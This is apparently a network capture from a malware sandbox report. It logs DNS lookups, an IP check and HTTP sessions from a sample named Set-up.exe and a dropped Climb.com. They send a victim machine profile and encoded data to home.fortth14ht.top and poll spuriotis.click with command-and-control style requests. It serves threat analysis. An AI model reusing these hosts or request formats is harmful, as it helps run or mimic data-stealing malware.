Dec 28, 2024 09:35:11.270947933 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.278904915 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.278944016 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.278959036 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.287334919 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.287390947 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.287400961 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.299906015 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.299997091 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.300043106 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.300043106 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.300846100 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.300846100 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.300862074 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.300870895 CET	443	49801	172.67.128.184	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:34:27.812144041 CET	57639	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:27.813307047 CET	57639	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:27.953545094 CET	53	57639	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:28.100851059 CET	53	57639	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:35.386193037 CET	61108	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:35.527067900 CET	53	61108	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:43.061197996 CET	61109	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:43.061249971 CET	61109	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:43.204163074 CET	53	61109	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:43.204178095 CET	53	61109	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:47.253734112 CET	51085	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:47.253797054 CET	51085	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:47.393630028 CET	53	51085	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:47.393757105 CET	53	51085	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:48.889461994 CET	51087	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:48.889462948 CET	51087	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:49.029468060 CET	53	51087	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:49.029480934 CET	53	51087	1.1.1.1	192.168.2.7
Dec 28, 2024 09:34:51.602408886 CET	51387	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:34:51.746069908 CET	53	51387	1.1.1.1	192.168.2.7
Dec 28, 2024 09:35:07.077642918 CET	51545	53	192.168.2.7	1.1.1.1
Dec 28, 2024 09:35:07.218135118 CET	53	51545	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:34:27.812144041 CET	192.168.2.7	1.1.1.1	0x4709	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:27.813307047 CET	192.168.2.7	1.1.1.1	0xd121	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 28, 2024 09:34:35.386193037 CET	192.168.2.7	1.1.1.1	0x9f69	Standard query (0)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:43.061197996 CET	192.168.2.7	1.1.1.1	0xe8fb	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:43.061249971 CET	192.168.2.7	1.1.1.1	0x4797	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:34:47.253734112 CET	192.168.2.7	1.1.1.1	0x6c58	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:47.253797054 CET	192.168.2.7	1.1.1.1	0xb454	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:34:48.889461994 CET	192.168.2.7	1.1.1.1	0xd94d	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:48.889462948 CET	192.168.2.7	1.1.1.1	0x4f9c	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:34:51.602408886 CET	192.168.2.7	1.1.1.1	0x90be	Standard query (0)	spuriotis.click	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:07.077642918 CET	192.168.2.7	1.1.1.1	0xa9a1	Standard query (0)	spuriotis.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:34:28.100851059 CET	1.1.1.1	192.168.2.7	0x4709	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:28.100851059 CET	1.1.1.1	192.168.2.7	0x4709	No error (0)	httpbin.org		3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:35.527067900 CET	1.1.1.1	192.168.2.7	0x9f69	Name error (3)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:43.204178095 CET	1.1.1.1	192.168.2.7	0xe8fb	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:47.393630028 CET	1.1.1.1	192.168.2.7	0x6c58	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:49.029480934 CET	1.1.1.1	192.168.2.7	0xd94d	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:51.746069908 CET	1.1.1.1	192.168.2.7	0x90be	No error (0)	spuriotis.click		172.67.128.184	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:51.746069908 CET	1.1.1.1	192.168.2.7	0x90be	No error (0)	spuriotis.click		104.21.2.51	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:07.218135118 CET	1.1.1.1	192.168.2.7	0xa9a1	No error (0)	spuriotis.click		104.21.2.51	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:07.218135118 CET	1.1.1.1	192.168.2.7	0xa9a1	No error (0)	spuriotis.click		172.67.128.184	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

spuriotis.click

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49726	194.87.58.92	80	7224	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:34:43.327140093 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 444328 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 36 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914075668", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:34:43.446976900 CET	7416	OUT	Data Raw: 4a 5c 2f 45 47 31 77 64 51 2b 49 6a 61 65 70 47 64 39 7a 38 4f 64 5a 6a 69 77 4f 70 57 56 39 63 57 4e 74 6f 49 4c 59 62 35 51 52 6e 47 56 7a 5c 2f 48 4f 49 2b 6e 37 39 45 7a 43 5c 2f 57 48 58 38 55 73 56 47 6e 68 63 52 58 77 6c 66 45 52 38 4f 66 Data Ascii: J\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGnhcRXwlfER8OfFWrhYYjDTdOtTWLpcDzws+Sas5U6soNNSjJxkm\/wCu6H0D\/pXYmnQq0fCqU4YmhSxNFPjbw5hUnRrwjOlP2M+L41o88ZJ8s4Rkr2lFNNH5CUV+v1v\/AMEnPEFwSP8AhdmioQcEHwRfEhh\/Cf8AipRg4wecHkV
Dec 28, 2024 09:34:43.447022915 CET	2472	OUT	Data Raw: 48 38 51 2b 4c 56 74 62 69 4a 35 37 66 55 76 45 73 73 49 6b 68 38 4f 61 64 4e 41 68 6e 6a 44 78 58 2b 73 79 32 6a 78 61 6c 44 6f 6b 75 6b 2b 62 71 45 50 7a 7a 65 66 74 39 66 74 6e 65 47 72 51 65 4a 50 48 58 5c 2f 41 41 53 32 2b 4c 32 6c 2b 43 62 Data Ascii: H8Q+LVtbiJ57fUvEssIkh8OadNAhnjDxX+sy2jxalDokuk+bqEPzzeft9ftneGrQeJPHX\/AAS2+L2l+CbZFudS1Hwf8YPDPxC8W2enlPON1H4B0nwTY6rPLDbq0t3by3doLNgY7qeIgtXKfsL6T4P\/AGa\/2MPGf7fHxrkn8W\/Fz4yeGde+Pnxa8dG3tL7xPqOjapdXWp+E\/BPhuVzDFp1neWcmkmLSI5bHTxr+pi3uPK07
Dec 28, 2024 09:34:43.447062016 CET	2472	OUT	Data Raw: 72 6d 67 36 41 38 74 50 34 30 6a 54 5c 2f 6c 72 33 45 5c 2f 53 71 62 4c 38 33 2b 78 5c 2f 77 42 4e 50 33 46 76 5c 2f 77 42 75 6e 62 72 5c 2f 41 50 58 71 35 74 5c 2f 64 5c 2f 50 38 41 6e 4a 5c 2f 50 38 5c 2f 35 59 36 69 6f 64 73 66 7a 5c 2f 41 4d Data Ascii: rmg6A8tP40jT\/lr3E\/SqbL83+x\/wBNP3Fv\/wBunbr\/APXq5t\/d\/P8AnJ\/P8\/5Y6iodsfz\/AMfl\/ve5oOyn1+RWLHbs+v8An8OP8mmSt+73v\/38\/wA9Ocf4VN\/rP4\/+2f8A9b+X8qYw3SO+yPH+fw55\/wD10GhW27o+T5faKLzf+Xj8f6d+1Qt8io7plOvmeV+P\/wCqrSHb+7\/6Zeb5nP8An\/PSkb\/Wf
Dec 28, 2024 09:34:43.447091103 CET	2472	OUT	Data Raw: 38 2b 33 36 30 2b 50 39 35 39 78 39 36 66 36 52 4c 4d 5a 4f 66 38 2b 6c 42 30 46 61 53 52 30 6b 52 50 4a 33 70 48 5c 2f 72 5a 4a 50 38 5c 2f 77 44 31 76 36 4d 6b 5c 2f 64 78 6f 48 2b 52 50 2b 66 67 5c 2f 35 39 66 65 6e 37 55 6b 58 5a 5c 2f 71 59 Data Ascii: 8+360+P959x96f6RLMZOf8+lB0FaSR0kRPJ3pH\/rZJP8\/wD1v6Mk\/dxoH+RP+fg\/59fen7UkXZ\/qYY\/+ekX+P6+neiON2Z0SHY4\/c\/6z\/PPpx6VPtfOX9fMCH5I9j\/vP3f73Mn+om\/z\/AFok+Vv9X\/rJf3v\/ACw\/z6UeWm7Zs+eSL\/ln\/wAscn\/OfrT23x7937z975s3lxf67\/P0759KPa+cv6+Z0H7z
Dec 28, 2024 09:34:43.447115898 CET	2472	OUT	Data Raw: 39 42 5c 2f 6e 38 61 5c 2f 33 78 50 38 41 6d 69 39 70 35 66 6a 5c 2f 41 4d 41 69 32 66 37 50 5c 2f 6a 76 5c 2f 41 4e 61 69 70 76 6e 5c 2f 41 4e 6e 39 61 68 72 50 32 6e 6c 2b 50 5c 2f 41 4e 41 72 39 32 5c 2f 77 44 67 6b 33 34 41 54 34 72 5c 2f 41 Data Ascii: 9B\/n8a\/3xP8Ami9p5fj\/AMAi2f7P\/jv\/ANaipvn\/ANn9ahrP2nl+P\/ANAr92\/wDgk34AT4r\/ALOH7cfwqe7FhH8S\/DWm+AHvm3lbJPGngT4k+G3uzsDvi3XUDKdis+E+UE4FfhJX9Dn\/AAQ5fHhX9o8ZxjxB8Lz1x107x0P\/AGWv5d+l9jK+D8H6mMwsvZYnCcV8M4rD1NH7OvhsZOtSnZppuM4RlZpp210P7L+
Dec 28, 2024 09:34:43.447150946 CET	2472	OUT	Data Raw: 5c 2f 31 71 44 6f 70 39 66 6c 2b 70 44 35 6e 58 2b 50 38 41 54 50 74 54 46 57 4e 6d 53 52 5c 2f 38 5c 2f 77 43 6a 66 5c 2f 57 71 62 62 5c 2f 41 2b 50 35 38 66 5c 2f 57 7a 2b 58 34 31 44 5c 2f 74 5c 2f 38 73 5c 2f 5c 2f 41 4b 5c 2f 35 39 4f 50 72 Data Ascii: \/1qDop9fl+pD5nX+P8ATPtTFWNmSR\/8\/wCjf\/Wqbb\/A+P58f\/Wz+X41D\/t\/8s\/\/AK\/59OPrx1oOwh+8vz+nSPn\/AD7fjxULf3Nv0z\/P\/J+verkifKnyf9+8\/wBPT6\/\/AF4Ywnzv\/H\/y1\/z\/AJ\/Wgql0\/wAP+RD5f\/TGopPz483\/AFvWpZD\/ALGz\/rpL+vT\/ADjpTP7ibY+evbyfpQdxDJs+
Dec 28, 2024 09:34:43.447235107 CET	4944	OUT	Data Raw: 78 5c 2f 76 4a 50 4c 32 52 7a 4a 48 39 6f 6c 38 30 5c 2f 75 50 4f 37 5c 2f 41 4f 4f 61 66 4a 6e 39 33 76 38 41 75 66 35 5c 2f 30 57 37 71 58 63 6e 33 4e 67 78 35 76 5c 2f 4c 76 46 35 48 2b 63 31 44 48 49 2b 50 37 69 52 5c 2f 36 72 39 39 64 66 2b Data Ascii: x\/vJPL2RzJH9ol80\/uPO7\/AOOafJn93v8Auf5\/0W7qXcn3Ngx5v\/LvF5H+c1DHI+P7iR\/6r99df+Av65NHx+Vvnv8Ad2NKfX5fqEn7zZvfZ5kVv5v7n9P8e\/H40NI6YT+P\/VCTzfP\/AM9Pwp8n+sTyf+eVvL9o83H6\/wD16hk2fM7p5P73yv3n+e\/1zxWZoM3eXvcIN\/mj93\/z2+n8v88m15PnTzN\/Mn+tP77
Dec 28, 2024 09:34:43.566704035 CET	4944	OUT	Data Raw: 78 39 64 4f 2b 49 42 5c 2f 6c 34 5c 2f 57 6f 7a 5c 2f 77 57 75 5c 2f 61 4f 5c 2f 68 2b 46 5c 2f 77 41 43 78 39 64 4a 2b 49 5a 5c 2f 6c 38 52 56 72 38 67 66 47 31 76 34 66 38 45 2b 43 4e 61 38 58 7a 66 46 50 34 50 65 49 39 5a 38 4a 66 42 6e 34 52 Data Ascii: x9dO+IB\/l4\/Woz\/wWu\/aO\/h+F\/wACx9dJ+IZ\/l8RVr8gfG1v4f8E+CNa8XzfFP4PeI9Z8JfBn4RftDeO\/hV4Y1v4jt8UvBHwY+NUfhH\/hDvHmrWfiX4UeGPh\/rWl211498G6f4mg8D\/ETxdf+HbnxHpst\/aLp7XF9b2vEOiWnhy28U6XcfEP4TXvxb8C\/DXUvi344\/Z00\/wAR+MpfjX4R8EaFoX\/CX+JLjV
Dec 28, 2024 09:34:43.566740036 CET	4944	OUT	Data Raw: 2f 6c 5c 2f 39 65 6c 5c 2f 65 65 57 36 62 50 38 41 6c 6c 2b 39 6b 38 33 5c 2f 41 4d 6c 66 38 5c 2f 57 6b 6a 58 37 6d 78 64 6a 6d 58 50 6c 79 63 66 35 4e 43 5c 2f 4d 75 7a 66 48 5c 2f 41 4e 4d 76 4d 36 5c 2f 71 50 2b 50 47 74 50 61 65 58 34 5c 2f Data Ascii: /l\/9el\/eeW6bP8All+9k83\/AMlf8\/WkjX7mxdjmXPlycf5NC\/MuzfH\/ANMvM6\/qP+PGtPaeX4\/8AD9fvj1pl5rPwf8AH2mWEfnXl5obxQRjPzuLm2fHyhj91T0Brzz44\/tR\/Df4oftNeMfjF8QtG8My\/B74Nf8ABSz4eftF+CvD\/wANfgUngOD9tz9m3VvEdtoHjDQvjJ4N8MeBvA+jfED42fB3w\/p994m+Gvj
Dec 28, 2024 09:34:43.566884041 CET	4944	OUT	Data Raw: 2f 77 42 33 34 76 30 54 55 76 43 39 70 6f 75 76 66 51 6b 58 68 32 79 74 7a 4a 4a 70 73 4e 6a 44 35 76 7a 53 47 32 74 34 6f 44 49 53 51 53 58 61 4e 45 4c 45 39 53 57 7a 6b 2b 39 5a 75 70 2b 48 72 57 5c 2f 6a 4d 57 71 61 52 62 58 73 52 55 72 73 76 Data Ascii: /wB34v0TUvC9pouvfQkXh2ytzJJpsNjD5vzSG2t4oDISQSXaNELE9SWzk+9Zup+HrW\/jMWqaRbXsRUrsvbWG5UKQcgCZH255OVPuOa\/W4eBuFw\/AWQcF4POMXQr8MZ\/V4jyfOJ4fD150swq43G4uXtcJVjLCVqThj8RhZU61GpH2M24r2ijOP4O\/pJ4\/MPE7P\/EPM8gwOMo8UcI5fwVnWSfWcXh4YjKMuyLKsjpTji6N
Dec 28, 2024 09:34:47.234494925 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:34:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49741	194.87.58.92	80	7224	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:34:47.545162916 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 28, 2024 09:34:48.880820036 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:34:48 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49748	194.87.58.92	80	7224	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:34:49.150624990 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 28, 2024 09:34:50.691662073 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:34:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	34.226.108.155	443	7224	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:29 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-28 08:34:30 UTC	224	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:30 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-28 08:34:30 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49754	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:53 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: spuriotis.click
2024-12-28 08:34:53 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 08:34:53 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k11fn3ssd51117dn4299k0gqt6; expires=Wed, 23 Apr 2025 02:21:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKcoZvy5MlHrpvQXq2kH%2F0QSY%2Fj96IohpHG2tXf63c29cliA4Nmf447gh0c7OqO1f%2BnRqnQ8lNRoBBlYUAMhGgsEwuctRERhB9Ov8f2c%2B2CYx5RuiUFldfz5uHMuZACaA5o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9036bb5ef7199d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1899&rtt_var=747&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1537651&cwnd=223&unsent_bytes=0&cid=4a5bc2177517f5e3&ts=924&x=0"
2024-12-28 08:34:53 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 08:34:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49760	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:55 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: spuriotis.click
2024-12-28 08:34:55 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
2024-12-28 08:34:55 UTC	1121	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1q4chrl1pbfiqjpkc9so3uttbk; expires=Wed, 23 Apr 2025 02:21:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jWPpILhOv4nN8R8%2BjKFeEUP2HjqFhVuPAEMCvOQOmGgrEXyg2ANx8RJ9GpebdtRxdr4Rk9oPaQUQp0HtBChh7ph2rGZnYNTO%2FDOfrwqL5rPmB891xVIZPbbGClxDKslG4d8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9036c8bacd43e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1754&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=944&delivery_rate=1575822&cwnd=216&unsent_bytes=0&cid=efd5c44db38b39ab&ts=784&x=0"
